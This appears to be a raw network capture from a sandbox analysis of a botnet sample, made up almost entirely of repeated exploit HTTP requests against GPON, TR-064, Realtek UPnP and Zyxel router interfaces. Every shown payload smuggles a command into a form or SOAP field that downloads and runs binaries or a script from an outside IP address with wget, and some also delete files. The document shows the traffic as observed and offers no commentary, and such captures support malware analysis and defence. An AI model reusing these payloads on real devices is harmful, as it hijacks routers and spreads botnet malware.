                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1563192.168.2.1358452118.146.202.220443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751235008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1564192.168.2.1347368118.67.10.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751262903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1565192.168.2.13347525.43.211.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751267910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1566192.168.2.1337618179.113.22.517547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.783149004 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:19.919342041 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:20.156586885 CET240INHTTP/1.1 401 Unauthorized
                                                        Content-Length: 0
                                                        WWW-Authenticate: Digest realm="IgdAuthentication", domain="/", nonce="NGE0ZTA5MDY6ZTdkMzlhY2Y6OGRhNDVjNzY=", qop="auth", algorithm=MD5, opaque="5ccc09c403ebaf9f0171e9517f40e41"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1567192.168.2.135390634.117.250.1857547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.991425991 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1568192.168.2.1358792212.93.120.20352869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.059494019 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:22.287372112 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:28.428318024 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:40.463373899 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1569192.168.2.1334086178.79.175.19580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.083684921 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:19.240678072 CET470INHTTP/1.1 404 Not Found
                                                        date: Thu, 21 Mar 2024 04:23:19 GMT
                                                        server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
                                                        content-length: 217
                                                        content-type: text/html; charset=iso-8859-1
                                                        set-cookie: NB_SRVID=srv91965255; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


